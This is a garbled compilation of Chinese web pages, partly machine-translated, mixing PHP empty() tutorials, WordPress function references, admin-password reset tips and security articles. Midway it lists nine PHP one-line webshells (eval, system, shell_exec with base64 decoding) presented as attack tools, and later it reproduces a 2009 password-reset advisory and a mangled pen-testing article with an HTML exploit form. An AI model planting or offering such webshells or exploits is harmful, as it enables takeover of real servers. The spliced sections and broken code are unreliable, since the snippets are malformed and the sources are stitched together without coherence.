wp系统if (empty($ POST['emergency pass'])) {

php !empty用法PHP提供了许多实用的函数和方法来处理数据，其中一个常用的函数是`!empty`。

这个函数用于判断一个变量是否为空，它可以帮助我们避免在处理数据时出现意外错误或异常。

那么，`!empty`的具体用法是什么呢？在本文中，我们将一步一步回答这个问题，并深入探讨如何在实际开发中正确使用这个函数。

# 1. `!empty`函数是什么？`!empty`函数是PHP中的一个内置函数，用于判断变量是否为空。

当一个变量为以下几种情况时，`!empty`函数会返回`false`：- 变量为`null`- 变量为一个空字符串`""`- 变量为整数`0`- 变量为浮点数`0.0`- 变量为一个空数组`[]`- 变量为一个没有元素的对象# 2. `!empty`函数的语法和返回值下面是`!empty`函数的语法：phpbool !empty(mixed var)`!empty`函数接受一个参数，即要判断的变量。

它会对变量进行空值检查，并且返回一个布尔值：- 如果变量为空，则返回`false`；- 如果变量不为空，则返回`true`。

# 3. 如何正确使用`!empty`函数正确使用`!empty`函数可以帮助我们避免在代码中出现各种错误和异常。

在以下情况下，我们可以使用`!empty`函数：- 用户输入验证：在接收用户输入数据之前，我们可以使用`!empty`函数检查数据是否为空。

例如，当用户提交一个表单时，我们可以使用`!empty`函数来验证用户是否填写了必填字段。

phpif (!empty(_POST['username'])) {处理表单提交逻辑} else {显示错误消息给用户}- 数据库查询结果处理：当从数据库中获取数据时，我们可以使用`!empty`函数检查查询结果是否为空。

例如，当查询用户信息时，我们可以使用`!empty`函数来处理查询结果。

WordPress代码插⼊⽂章函数：wp_insert_post【描述】该函数可在数据库中插⼊⽂章（及页⾯）。

它可以进⾏处理变量，检查操作，填充⽇期/时间等缺失变量等⼯作。

该函数以对象作为变量，返回已创建⽂章的编号（出错时返回0）。

【使⽤⽅法】<?php wp_insert_post( $post, $wp_error ); ?>【参数】$post(array) (必需) ⼀个⽂章对象. 与数据库wp_posts表中的字段⼀⼀对应默认: ⽆重要: 如果设置$post[‘ID’]的值，将不会创建这个ID的⽂章. 设置这个值将会更新这个ID的⽂章. 简单的说，创建⼀个⽂章 $post[‘ID’] 必须为空或不设置这个值.$post = array('ID' => [ <post id> ] //需要更新的⽂章编号'menu_order' => [ <order> ] //如果新⽂章是页⾯，设置显⽰顺序'comment_status' => [ 'closed' | 'open' ] // 评论的状态，'closed'关闭评论.'ping_status' => [ 'closed' | 'open' ] // ping的状态，'closed' 关闭 pingbacks和trackbacks'pinged' => [ ? ] //该⽂章被ping到的地址'post_author' => [ <user ID> ] //作者编号'post_category' => [ array(<category id>, <...>) ] //⽂章归类数组'post_content' => [ <the text of the post> ] //⽂章内容，必填'post_date' => [ Y-m-d H:i:s ] //⽂章编辑⽇期'post_date_gmt' => [ Y-m-d H:i:s ] //⽂章编辑GMT⽇期'post_excerpt' => [ <an excerpt> ] //摘要信息'post_name' => [ <the name> ] // (slug) ⽂章别名'post_parent' => [ <post ID> ] //新⽂章的⽗⽂章编号'post_password' => [ ? ] //⽂章浏览密码'post_status' => [ 'draft' | 'publish' | 'pending'| 'future' | 'private' ] //新⽂章的状态'post_title' => [ <the title> ] //⽂章标题，必填'post_type' => [ 'post' | 'page' | 'link' | 'nav_menu_item' | custom post type ] //⽂章类型：⽂章、页⾯、链接、菜单、其他定制类型'tags_input' => [ '<tag>, <tag>, <...>' ] //标签字符串'to_ping' => [ ? ] //该⽂章需要ping到的地址'tax_input' => [ array( 'taxonomy_name' => array( 'term', 'term2', 'term3' ) ) ] // 附加注释数组);$wp_error(布尔型) (可选) 失败时是否返回WP_Error对象默认: false【返回的值】若⽂章成功加⼊数据库，返回⽂章编号。

比如形如主题文件夹下 header.php 中的一段代码：
<title> <?php wp_title(’ | ‘,true,’right’); ?> <?php bloginfo(’name’); ?> - <?php bloginfo(’description’); ?> </title>
在博客首页可以显示这样的效果“月夜 - 分享网络知识·享受快乐生活”；在 文章页，可以显示这样的效果“用好 WordPress 不可不知的 50 个函数 | 月夜 分享网络知识·享受快乐生活”；而在分类页面，则可以显示这样的效果“网站 相关 | 月夜 - 分享网络知识·享受快乐生活”；等等。
limit=10 表示显示的文章存档的最大数量为 10，超过次数，则超出部分不显示；
尽管参数稍多，显得略为复杂，但其实只需注意 type、show_post_count 以及 limit 等三个参量即可。
4.wp_list_categories()
和 wp_get_archives()函数类似，wp_list_categories()函数用来获取博客文章 的分类信 息，并可以通过设置适当的函数参数，将其显示出来。该函数的参数 和 wp_get_archives()函数类似，都需要使用&连接，放在单引号 (’)中以字符
bloginfo(’charset’) 显示博客的编码方式，如“UTF-8”；
一种常见的使用 bloginfo()函数的组合如下：
<a href=”<?php bloginfo(’url’); ?>” title=”<?php bloginfo(’ description’); ?>” ><?php bloginfo(’name’); ?>

webshell一句话1. PHP一句话WebshellPHP一句话Webshell是一种常见的Web攻击工具，它可以通过web 页面执行系统命令，获取服务器权限，进而对目标服务器进行控制和攻击。

下面列举了十个常用的PHP一句话Webshell。

1. eval($_POST['cmd']);这是最基本的一句话Webshell，通过接收POST参数cmd来执行任意系统命令。

2. echo shell_exec($_GET['cmd']);利用shell_exec函数执行命令，并将结果输出到页面上。

3. system($_REQUEST['cmd']);通过system函数执行系统命令，并返回命令执行结果。

4. passthru($_REQUEST['cmd']);使用passthru函数执行系统命令，并将结果原样输出。

5. exec($_POST['cmd'], $output);通过exec函数执行命令，并将结果保存到$output变量中。

6. popen($_GET['cmd'], 'r');通过popen函数执行命令，并返回一个文件指针，可以用来读取命令执行结果。

7. proc_open($_REQUEST['cmd'], array(0 => STDIN, 1 => STDOUT, 2 => STDERR), $pipes);通过proc_open函数执行命令，并将输入、输出和错误流分别重定向到标准输入、输出和错误流。

8. shell_exec(base64_decode($_GET['cmd']));对命令进行base64编码，然后使用shell_exec函数执行解码后的命令。

9. $_GET['a']($_POST['b']);通过GET参数a指定要执行的函数，POST参数b作为函数的参数。

一、忘记了用户密码同时邮件找回功能不起作用问题描述：你丢失了你的WordPress 管理员密码，也尝试过点“忘记密码” 进去填写了用户名和 Email 地址。

但是却没有收到重设密码的邮件。

这里有两个很简单的方法来重设你的 WordPress 管理员密码：方法 1： phpMyAdmin1. 如果您是 cPanel 空间用户，登录 cPanel 后，点击 Database（数据库）下的 phpMyAdmin2. 选择你的 WordPress 数据库。

例如 Username_wrdp13. 找到 wp_users，点击 Browse4. 找到你的用户名然后点击 Edit。

5. 通过在 user_pass 里写入新的值来重设你的密码。

记住，是有大小写区分的。

6. 完成上面一步之后，点击 Function 的下拉菜单，从选项中选择 MD57. 在页面的最低端，点击 Go 按钮。

方法2：通过 FTP1. 登录你的 FTP 账户。

2. 找到 ../wp-content/themes/（你的主题文件）/ 目录，然后下载 functions.php 文件。

3. 打开 functions.php 然后在第一个 <?php 后面加上下面一行代码：wp_set_password('YourNewPassword',1);把 YourNewPassword 这个值换成你想要的密码。

这个代码里的 1 代表的是 wp_users 表上的用户 ID。

4. 把改好的 functions.php 再次上传到 FTP 当中。

5. 当你可以登录到 WordPress 的时候，再去删掉那行代码。

二、WordPress 控制面板（Dashboard）不能正常显示问题描述：WordPress 控制面版里面的 CSS 未能显示出来，页面上的链接很乱。

解决方法1：端口和防火墙检查一下你的网络连接是经过端口和防火墙的。

有一些端口和防火墙是会过滤到 CSS 的，所以有 CSS 的地方会显示不正常。

完整的WordPress函数大全在修改和制作Wordpress主题时经常为不知道内置函数而苦恼，而wordpress官方的文档看起来又不是那么方便。

所搜集并且整理了一下放这，以备后用。

判断页面函数is_home() : 是否为主页is_single() : 是否为内容页(P ost)is_page() : 是否为内容页(Page)is_category() : 是否为Category/Archive页is_tag() : 是否为Tag存档页is_date() : 是否为指定日期存档页is_year() : 是否为指定年份存档页is_month() : 是否为指定月份存档页is_day() : 是否为指定日存档页is_time() : 是否为指定时间存档页is_archive() : 是否为存档页is_search() : 是否为搜索结果页is_404() : 是否为“HTTP 404: Not Found”错误页is_paged() : 主页/Category/Archive页是否以多页显示Header部分常用到的PHP函数<?php bloginfo(‟name‟); ?> : 博客名称(Title)<?php bloginfo(‟stylesheet_url‟); ?> : CSS文件路径<?php bloginfo(‟pingback_url‟); ?> : PingBack Url <?php bloginfo(‟template_url‟); ?> : 模板文件路径<?php bloginfo(‟version‟); ?> : WordPress版本<?php bloginfo(‟atom_url‟); ?> : Atom Url<?php bloginfo(‟rss2_url‟); ?> : RSS 2.o Url<?php bloginfo(‟url‟); ?> : 博客Url<?php bloginfo(‟html_type‟); ?> : 博客网页Html类型<?php bloginfo(‟charset‟); ?> : 博客网页编码<?php bloginfo(‟description‟); ?> : 博客描述<?php wp_title(); ?> : 特定内容页(Post/Page)的标题模板常用的PHP函数及命令<?php get_header(); ?> : 调用Header模板<?php get_sidebar(); ?> : 调用Sidebar模板<?php get_footer(); ?> : 调用Footer模板<?php the_content(); ?> : 显示内容(Post/Page)<?php if(have_posts()) : ?> : 检查是否存在Post/Page<?php while(have_posts()) : the_post(); ?> : 如果存在P ost/Page则予以显示<?php endwhile; ?> : While 结束<?php endif; ?> : If 结束<?php the_time(‟字符串‟) ?> : 显示时间，时间格式由“字符串”参数决定，具体参考PHP手册<?php comments_popup_link(); ?> : 正文中的留言链接。

WORDPRESS函数使用说明WordPress是一个非常流行的开源内容管理系统（CMS），它提供了丰富的功能和灵活的扩展性，使得用户可以轻松创建和管理自己的网站。

WordPress的功能主要是通过函数调用来实现的，函数提供了许多方便的方法来完成各种任务，包括创建页面、发布文章、添加插件、更改主题等。

在这篇文章中，我们将详细介绍一些常用的WordPress函数，以及它们的使用说明。

1. get_header(和get_footer(: 这两个函数用于在页面中引入网站的头部和底部。

可以将它们放置在页面的适当位置，以保证每个页面都有一致的布局和样式。

2. bloginfo(: 这个函数用于输出网站的基本信息，比如网站的名称、描述、URL等。

可以使用不同的参数来获取不同的信息，比如bloginfo('name')将输出网站的名称，bloginfo('description')将输出网站的描述。

3. wp_nav_menu(: 这个函数用于创建自定义菜单。

可以通过在WordPress后台创建菜单，并给菜单分配位置，然后使用wp_nav_menu(函数将菜单输出到指定位置。

4. get_sidebar(: 这个函数用于引入侧边栏的内容。

可以将它放置在页面的适当位置，以显示一些附加的信息、小工具或广告。

6. the_loop(: 这个函数用于循环输出查询结果。

通常配合wp_query(函数一起使用，可以在循环中使用其他函数来输出文章的标题、内容、缩略图等信息。

7. get_permalink(: 这个函数用于获取文章或页面的永久链接。

可以使用这个函数来生成自定义的链接，比如在文章列表中添加“阅读全文”链接。

8. the_title(和the_content(: 这两个函数分别用于输出文章或页面的标题和内容。

可以将它们放置在循环中，以逐个输出查询结果。

9. the_post_thumbnail(: 这个函数用于输出文章或页面的特色图像。

WordPress安全，-，隐藏保护wp-login.php后台登
陆入口
如果我们搭建的网站有开启日志跟踪之后，如果你也有查看日志的习惯，不管是虚拟主机，还是VPS上，我们的网站都会被人为或者软文有意或者无意的扫描Wordpress登陆入口。

作为全球最大的开源网站程序，每天都有希望入侵这套程序的高手，有些时候可能不是针对我们的网站，但可能因为密码比较简单成为中招对象。

日志记录登录wp-login.php页面情况
我们在基本的设置账户用户名和密码安全基础上，最好把这个登录入口限制访问或者隐藏，之前也有看到一些教程说安装插件，比如安装StealthLoginPage插件可以设置登录页面后的参数，与我要设置的非插件实现一样的。

也可以使用LimitLoginAttempts限制登录次数，如果超过一定次数就限制访问。

我们能不用插件就不用插件，通过修改function.php文档的方
法解决
add_action('login_enqueue_scripts','login_protection'); functionlogin_protection(){
if($_GET['root']!='genbanorg')header('Location:http://
任意其他网站或者网站首页/');
}
添加上面的脚本就可以，然后修改红色部分为自己需要的就可以，以后我们登录自己的WP网站只需要用到这样的后台路径。

/wp-login.php?root=genbanorg 如果不是用的这样的路径就会按照我们设置的跳转出去，确保登录入口的隐蔽性。

empty函数empty(函数是一个用于判断变量是否为空的函数，通常用于检测变量是否具有有效值。

在PHP中，empty(函数返回一个布尔值，如果变量为空，则返回true，否则返回false。

变量为空的情况包括以下几种情况：1. 变量为null：当一个变量的值为null时，empty(函数返回true。

null表示变量没有被赋予任何值。

2. 变量为空字符串：如果一个变量的值是空字符串""，那么empty(函数也会返回true。

3. 变量为0：如果一个变量的值是整数0，那么empty(函数也会返回true。

4. 变量为false：如果一个变量的值为false，那么empty(函数也会返回true。

除了以上情况，empty(函数会返回false，表示变量具有有效值。

在使用empty(函数判断变量是否为空时，需要注意一些细节。

首先，当一个未声明的变量被传递给empty(函数时，会出现"Notice:Undefined variable"的警告，这时建议先使用isset(函数判断变量是否被声明。

其次，当一个数组或对象被传递给empty(函数时，它会检查该数组或对象是否包含元素，如果是空的，将返回true。

这也是判断数组或对象是否为空的常用方法。

以下是一些示例，展示empty(函数的用法和结果：```php$var1 = null;$var2 = "";$var3 = 0;$var4 = false;$var5 = "Hello, World!";$var6 = array(;$var7 = new stdClass(;var_dump(empty($var1)); // bool(true)var_dump(empty($var2)); // bool(true)var_dump(empty($var3)); // bool(true)var_dump(empty($var4)); // bool(true)var_dump(empty($var5)); // bool(false)var_dump(empty($var6)); // bool(true)var_dump(empty($var7)); // bool(true)```在实际开发中，empty(函数常用于检查用户输入、验证表单数据、判断变量是否为空等场景。

一、问题背景在使用PHP中的curl进行请求时，有时候会遇到返回空字符串的情况。

这个问题可能会让开发者感到困惑，因为他们预期会收到一些数据或者错误信息。

在本文中，我们将了解可能导致这种情况发生的原因，并提供解决方案。

二、可能的原因1. 服务器端没有正确响应请求2. 请求中的参数或头部信息有误3. 网络连接问题导致请求失败4. 服务器端可能会对请求进行一些验证，如IP位置区域验证等三、解决方案针对上述可能的原因，我们可以采取以下几种解决方案：1. 检查服务器端是否正确响应请求，可以使用其他工具模拟请求，如Postman等，来验证服务器的响应情况。

2. 检查请求中的参数或头部信息是否有误，可以逐一检查每个参数的值，并且确认头部信息是否正确设置。

3. 如果网络连接不稳定，我们可以尝试使用其他网络进行请求，或者等待网络环境稳定后再次发起请求。

4. 对于服务器端可能进行的验证，我们需要了解服务器端的具体配置，并且根据其要求进行相应的处理，如特定IP位置区域的设置等。

四、示例代码以下是一个简单的示例代码，演示了如何使用curl进行GET请求，并且处理可能出现的返回空字符串的情况：```php$url = '网络协议sxxx$ch = curl_init($url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch);if($response === false) {echo 'Error: ' . curl_error($ch);} else {if(empty($response)) {echo 'Empty response';} else {echo $response;}}curl_close($ch);```在上面的示例中，我们首先初始化了一个curl请求，然后设置了返回数据而不是直接输出到屏幕上。

php中empty的用法PHP中的empty()函数是用来检查一个变量是否为空。

在PHP的开发中，经常需要判断一个变量是否为空，以便进行相应的逻辑处理。

本文将详细介绍empty()函数的用法，以帮助读者更好地理解和应用这一函数。

一、empty()函数的基本语法和返回值empty()函数的基本语法为：bool empty(mixed var)其中，var是要检查的变量。

empty()函数的返回值为布尔值，即如果检查的变量为空，返回true；如果检查的变量不为空，返回false。

二、empty()函数的用法详解在实际的应用中，empty()函数常常配合条件语句if来使用，以进行相应的判断和处理。

下面一一介绍empty()函数的各种用法。

1. 判断变量是否为空最常见的用法是判断一个变量是否为空。

例如：phpusername = "";if (empty(username)) {echo "用户名不能为空";}上述代码中，判断了变量username是否为空，如果为空，则输出提示信息"用户名不能为空"。

注意，empty()函数对于空字符串、0、false、NULL 以及未定义的变量均会返回true。

2. 判断数组是否为空除了对单个变量的判断，empty()函数也可以用来判断数组是否为空。

例如：phpuserinfo = array();if (empty(userinfo)) {echo "用户信息为空";}上述代码中，判断了数组userinfo是否为空，如果为空，则输出提示信息"用户信息为空"。

注意，当数组为空时，empty()函数也会返回true。

3. 判断对象是否为空empty()函数还可以用来判断对象是否为空。

例如：phpclass User {public name;}user = new User();if (empty(user->name)) {echo "用户名为空";}上述代码中，判断了对象user的属性name是否为空，如果为空，则输出提示信息"用户名为空"。

wordpress的重设密码漏洞漏洞预警-电脑资料====================================== =======- Release date: August 10th, 2009- Discovered by: Laurent Gaffié- Severity: Medium====================================== =======I. VULNERABILITY-------------------------WordPress <= 2.8.3 Remote admin reset passwordII. BACKGROUND-------------------------WordPress is a state-of-the-art publishing platform. with a focus onaesthetics, web standards, and usability. WordPress is both free andpriceless at the same time. More simply, WordPress is what you use whenyou want to work with your blogging software, not fight it.III. DESCRIPTION-------------------------The way Wordpress handle a password reset looks like this: You submit your email adress or username via this form. /wp-login.php?action=lostpassword ;Wordpress send you a reset confirmation like that via email: "Someone has asked to reset the password for the followingsite and username.Username: adminTo reset your password visit the following address, otherwise justignore this email and nothing will happen"You click on the link, and then Wordpress reset your admin password, andsends you over another email with your new credentials.Let's see how it works:wp-login.php:...[snip]....line 186:function reset_password($key) {global $wpdb;$key = preg_replace('/[^a-z0-9]/i', '', $key);if ( empty( $key ) )return new WP_Error('invalid_key', __('Invalid key'));$user = $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users WHERE user_activation_key = %s", $key));if ( empty( $user ) )return new WP_Error('invalid_key', __('Invalid key'));...[snip]....line 276:$action = isset($_REQUEST['action']) ? $_REQUEST['action'] : 'login';$errors = new WP_Error();if ( isset($_GET['key']) )$action = 'resetpass';// validate action so as to default to the login screenif ( !in_array($action, array('logout', 'lostpassword', 'retrievepassword', 'resetpass', 'rp', 'register', 'login')) && false === has_filter('login_form_' . $action) )$action = 'login';...[snip]....line 370:break;case 'resetpass' :case 'rp' :$errors = reset_password($_GET['key']);if ( ! is_wp_error($errors) ) {wp_redirect('wp-login.php?checkemail=newpass');exit();}wp_redirect('wp-login.php?action=lostpassword&error=invalidkey');exit();break;...[snip ]...You can abuse the password reset function, and bypass the first step andthen reset the admin password by submiting an array to the $keyvariable.IV. PROOF OF CONCEPT-------------------------A web browser is sufficiant to reproduce this Proof of concept:The password will be reset without any confirmation.V. BUSINESS IMPACT-------------------------An attacker could exploit this vulnerability to compromise the adminaccount of any wordpress/wordpress-mu <= 2.8.3VI. SYSTEMS AFFECTED-------------------------AllVII. SOLUTION-------------------------No patch aviable for the moment.VIII. REFERENCES-------------------------IX. CREDITS-------------------------This vulnerability has been discovered by Laurent Gaffié Laurent.gaffie{remove-this}(at)I'd like to shoot some greetz to for them greatresearch on PHP, as for this under-estimated vulnerability discovered byX. REVISION HISTORY-------------------------August 10th, 2009: Initial releaseXI. LEGAL NOTICES-------------------------The information contained within this advisory is supplied "as-is"with no warranties or guarantees of fitness of use or otherwise.I accept no responsibility for any damage caused by the useormisuse of this information.# [2009-08-11]。

PHP表单验证方法PHP 表单验证方法引导语：PHP 独特的语法混合了C、Java、Perl以及PHP自创的语法。

以下是店铺整理的PHP 表单验证方法，欢迎参考阅读!PHP - 输入字段在下面的代码中我们增加了一些新变量：$nameErr、$emailErr、$genderErr 以及 $websiteErr。

这些错误变量会保存被请求字段的`错误消息。

我们还为每个 $_POST 变量添加了一个 if else 语句。

这条语句检查 $_POST 变量是否为空（通过 PHP empty() 函数）。

如果为空，则错误消息会存储于不同的错误变量中。

如果不为空，则通过test_input() 函数发送用户输入数据：<?php// 定义变量并设置为空值$nameErr = $emailErr = $genderErr = $websiteErr = "";$name = $email = $gender = $comment = $website = "";if ($_SERVER["REQUEST_METHOD"] == "POST") {if (empty($_POST["name"])) {$nameErr = "Name is required";} else {$name = test_input($_POST["name"]);}if (empty($_POST["email"])) {$emailErr = "Email is required";} else {$email = test_input($_POST["email"]);}if (empty($_POST["website"])) {$website = "";} else {$website = test_input($_POST["website"]);}if (empty($_POST["comment"])) {$comment = "";} else {$comment = test_input($_POST["comment"]);}if (empty($_POST["gender"])) {$genderErr = "Gender is required";} else {$gender = test_input($_POST["gender"]);}}>PHP - 显示错误消息在HTML 表单中，我们在每个被请求字段后面增加了一点脚本。

WordPress相关日志-管理资料昨晚手欠，点了一下“升级Wordpress”，于是就开始了各种忙乱，首先是在升级前没有停用正在使用的插件，老旧插件导致Wordpress的前台、后台全部白屏。

解决办法：ftp登陆上去，将插件文件夹plugins重命名。

其次就是各插件恢复使用后，SimpleTags插件的作者没有提供更新，现有版本2.0-beta9不支持WordPress3.2，导致“相关日志”无法正常工作。

言归正传，说一下如何直接用代码实现“相关日志”的功能。

打开当前所用的模版文件夹找到functions.php添加如下代码：//WordPressRelatedPosts$wp_rp=array('wp_rp_date'=>false,//显示文章发布日期'wp_rp_comments'=>false,//显示文章评论数);functionwp_get_random_posts($limitclause=""){global$wpdb,$post;$q="SELECTID,post_title,post_content,post_excerpt,post_d ate,comment_countFROM$wpdb->postsWHEREpost_status='publish'ANDpost_type='post'ANDID!=$ post->IDORDERBYRAND()$limitclause";return$wpdb->get_results($q);}functionwp_get_related_posts(){global$wpdb,$post,$wp_rp;$limit=$wp_rp["limit"];if(!$post->ID){return;}$now=current_time('mysql',1);null=wp_get_post_tags($post->ID);$taglist="'".null[0]->term_id."'";$tagcount=count(null);if($tagcount>1){for($i=1;$i<$tagcount;$i++){$taglist=$taglist.",'".null[$i]->term_id."'";}}if($limit){$limitclause="LIMIT$limit";}else{$limitclause="LIMIT10";}$q="SELECTp.ID,p.post_title,p.post_content,p.post_excerp t,p.post_date,ment_count,count(t_r.object_id)ascntFROM $wpdb->term_taxonomyt_t,$wpdb->term_relationshipst_r,$wpdb->postspWHEREt_t.taxonomy='post_tag'ANDt_t.term_taxonomy_id= t_r.term_taxonomy_idANDt_r.object_id=p.IDAND(t_t.term_idIN( $taglist))ANDp.ID!=$post->IDANDp.post_status='publish'ANDp.post_date_gmt<'$now'GROUP BYt_r.object_idORDERBYcntDESC,p.post_date_gmtDESC$limitclau se;";$related_posts=$wpdb->get_results($q);$output="";//不存在相关日志则显示随机日志if(!$related_posts){if($wp_rp['wp_no_rp']=="text"){$output.='无相关日志}else{if($wp_rp['wp_no_rp']=="random"){$wp_no_rp_text='随机文章：';$related_posts=wp_get_random_posts($limitclause); }$wp_rp_title=$wp_no_rp_text;}}foreach($related_postsas$related_post){$output.='';if($wp_rp['wp_rp_date']){$dateformat=get_option('date_format');$output.=mysql2date($dateformat,$related_post->post_date)."—";//日期和文章标题间隔符，默认是—}$output.='ID).'"title="'.wptexturize($related_post->post_title).'">'.wptexturize($related_post->post_title).'';if($wp_rp["wp_rp_comments"]){$output.="(".$related_post->comment_count.")";}$output.='}$output=''.$output.'';$wp_rp_title_tag=$wp_rp["wp_rp_title_tag"];if(!$wp_rp_title_tag)$wp_rp_title_tag='h3';if($wp_rp_title!='')$output='<'.$wp_rp_title_tag.'>'.$wp_rp_title.''.$output;return$output;}functionwp_related_posts_attach($content){global$wp_rp;if(is_single()||(is_feed()&&$wp_rp["wp_rp_rss"])){$output=wp_get_related_posts();$content=$content.$output;}return$content;}add_filter('the_content','wp_related_posts_attach',100);。

wordpress系统忘记admin登录密码的解决方法最近有朋友的wordpress网站忘记admin密码了，找到我协助解决，在这里给大家分享给最简单的解决方案：一、用文本工具创建一个文件，例如命名为resetPwd.php；二、在该文件resetPwd.php中添加以下代码：<?php//password resetterinclude(“wp-config.php”);include(“wp-blog-header.php”);if (empty($_POST[’emergency_pass’])) {?><form method=”post”>set admin password: <input name=”emergency_pass” type=”password” /><input type=”submit” /></form><?php} else {$sql = “UPDATE “.$wpdb->users.” SET user_pass =‘”.md5($_POST[’emergency_pass’]).”‘ WHERE User_login = ‘admin'”;$link = $wpdb->query($sql);wp_redirect(‘wp-login.php’);exit();}?>三、上传resetPwd.php文件至你的wordpress网站的目录下，然后执行http://你的网站URL/resetPwd.php；四、在页面中输入新密码即完成密码重设；五、最后务必记得要从你的网站目录下删除掉resetPwd.php文件（切记，非常重要！）。

小结：登录主要是围绕写Session，判断Session,读取Session展开的。

写入Session: Session:set(‘userinfo’,$user);判断Session: if(Session:is_set(‘userinfo’));读取session: Session:get(‘userinfo’);public function checkLogin() {$secure_code = C('SECURE_CODE');//读取配置文件中SECURE_CODE的值$userUsername = $_POST["username"];$Password = md5($secure_code.md5($_POST["password"]));if(empty($_POST['username'])) {$this->error('帐号错误！');}elseif (empty($_POST['password'])){$this->error('密码必须！');}//elseif ($_SESSION['verify'] != md5($_POST['verify'])){ //$this->error('验证码错误！');//}//生成认证条件$map = array();$map["username"] = $_POST['username'];$map["status"] = array('gt',0);// $map['字段名'] = array('表达式','查询条件');//gt 大于$userDao = D('User');$user = $userDao->find($map);//使用用户名、密码和状态的方式进行认证if(false === $user) {$this->error('用户名不存在或已禁用！');}else {if($user['name'] != $_POST['username']) {$this->error('帐号错误！');}if(md5($secure_code.$user['password']) != $userPassword) { $this->error('密码错误！');}}$_SESSION[C('USER_AUTH_KEY')] = $user->uid;$userD ao->setField('lastLoginTime',time(),"id=".$user[‘id’]); //更新lastLoginTime字段的值if($u ser->type =='a') {// 管理员不受权限控制影响$_SESSION['administrator'] = true;$_SESSION['isAdmin'] = true;}else{$_SESSION['administrator'] = false;}//记录登陆状态import("ORG.Util.RBAC");//引入权限的访问控制类import("ORG.Util.Session");//引入Session类import("ORG.Util.Cookie");//引入Cookie类Session::set('id',$user['i d']);Session::set('userinfo',$u ser);Cookie::set('username',$u serUsername,36000000);RBAC::saveAccessList();//$this->success('登录成功！');$this->redirect("index/show");//登录跳转。

WordPress博客个人信息发布平台0DAY漏洞预警-电脑资料Framework of the preceding article was not allowed to tell me more about some interesting unpublished vulnerabilities and banal omissions WordPressSo now you'll be able to read the continuation of the penetration-testing of the famous blogging platformHere we go!StatisticsTo begin, I want to cite some statistics from a study that was conducted by me in the middle of January this year.From issuing beloved by all Google was randomly taken 33,534 unique blog running on WordPress, which were then parsed in an attempt to determine their versionHere's what came of it:1.5.x - 207 blogs (0.6%)2.0.x - 1624 blog (4.8%)2.1.x - 1,219 blogs (3.6%)2.2.x - 2,175 blogs (6.4%)2.3.x - 4,366 blogs (13%)2.5.x - 4343 blog (12.9%)2.6.x - 8,715 blogs (25.9%)2.7.x - 5,986 blogs (17.8%)Unknown - 4899 blogs (14.6%)One can understand that the most popular and represent for you and me, interesting branches are 2.3.x, 2.5.x, 2.6.x, 2.7.x (2.4.x developers have missed for some reason).At the same time, these branches was found and published a very small number of vulnerabilities (recall that the last sql-injection was in public in the 2.2.2 version).In the first part I tried to correct this misunderstanding, but as you already knew this was not the last closet Vulnerability WordPress ...Joke humorImagine that on the right we present blog post with the addressDo you want to annoy /make fun of the admin and make sure that this post had also address suchDevelopers WordPress gladly give you that opportunity! But what it is: a bug or a feature - I do not know:).To begin a detailed analyze the mechanism of posting comments in the final at this writing, version 2.7.1.1I've found wp-comments-post.php (as well as the wp-trackback.php), through which all comments have a following code:</p><p> $ Commentdata = compact ('comment_post_ID', 'comment_author', 'comment_author_email', 'comment_author_url', 'comment_content', 'comment_type', 'comment_parent', 'user_ID');</p><p> $ Comment_id = wp_new_comment ($ commentdata);</p><p> 2This function we can easily find in/Wp-includes /comment.php:</p><p> function wp_new_comment ($ commentdata)</p><p> {</p><p> ...</p><p> $ Com ment_ID = wp_insert_comment ($ commentdata);</p><p> ...</p><p> }</p><p> 3Ibid spend a small reversing:</p><p> function wp_insert_comment ($ commentdata)</p><p> {</p><p> ...</p><p> if ($ comment_approved == 1)</p><p> wp_update_comment_count($ comment_post_ID);</p><p> return $ id;</p><p> }</p><p> function wp_update_comment_count ($ post_id, $ do_deferred = false)</p><p> {</p><p> ...</p><p> elseif ($ post_id) {</p><p> return wp_update_comment_count_now ($ post_id);</p><p> }</p><p> }</p><p> function wp_update_comment_count_now($ post_id)</p><p> {</p><p> ...</p><p> do_action ('edit_post', $ post_id, $ post);</p><p> return true;</p><p> }</p><p>4Action edit_post defined in/Wp-includes /default-filters.php:</p><p> add_action ('edit_post', 'wp_check_for_changed_slugs');</p><p>5Find the desired us to function in/Wp-includes /post.php:</p><p> function wp_check_for_changed_slugs ($ post_id) {</p><p> if (! isset ($ _POST ['wp-old-slug']) | |! strlen ($ _POST ['wp-old-slug']))</p><p> ...</p><p> //If we haven't added this old slug before, add it now</p><p> if (! count ($ old_slugs) | |! in_array ($ _POST ['wp-old-slug'], $ old_slugs))</p><p> add_post_meta. ($ post_id, '_wp_old_slug', $ _POST ['wp-old-slug']);</p><p> ...</p><p> }</p><p>6And, actually, what all this code we needed,/Wp-includes /query.php:</p><p> function wp_old_slug_redirect ()</p><p> {</p><p> ...</p><p> $ Query = "SELECTpost_id FROM $ wpdb-> postmeta, $ wpdb-> posts WHERE ID = post_id AND meta_key = '_wp_old_slug' AND meta_value = '"$ Wp_query-> query_vars ['name']"'";</p><p> ...</p><p> wp_redirect ($ link, '301 '); //Permanentredirect</p><p> exit;</p><p> endif;</p><p> }</p><p >From the analysis above code the following conclusion: if the database for a particular position has a value «_wp_old_slug», then it is carried out a redirect to the real address of the postT o add this value, your comment must be zaappruvlenHow to leave comments without being moderated, you already know the first part of the article:)Now, finally, ready to exploit for our jokes:</p><p> <html></p><p> <form. action="/wp/wp-trackback.php?p=[ID]" method="post"></p><p> Title: <input name="title" value="commenter" /> <br /></p><p> URL: <input name="url" value="http://%/" /> <br /></p><p> Comment: <input name="excerpt" value="" /> <br /></p><p> Slug: <input name="wp-old-slug" value="" /> <br /></p></td></tr></table><tr><td><input name="blog_name" value="Blog" /> <br /></p><p> <input type="submit" value="ok" /></p><p> </Form></p><p> </Html></p><p> In the «Slug» insert the new name for a suitable post and link admin to show, watching his reaction.Unsafe SnoopyIt is time to take another nod to the previous articleAs you may remember, WordPress 2.5.x-2.6.x allows any registered usercan easily substitute for RSS-feeds in the DashboardDug out this wonderful bug bit deeper, we can easily achieve the execution of arbitrary code on the server that is running a blog.So, remember about a discovered zabugornye kodokopatelyami code exec vulnerability in the class Snoopy, which is also present in WordpressItself is a vulnerability in the Snoopy vordpressovskom was patched with escapeshellcmd still in 1.5.x branch, but, nevertheless, the developers have taken, and spoiled quite workable code incomprehensible patch in version2.6.3.I guess what they were thinking by looking at the post devbloga with these words:A vulnerability in the Snoopy library was announced todayWordPress uses Snoopy to fetch the feeds shown in the DashboardAlthough this seems to 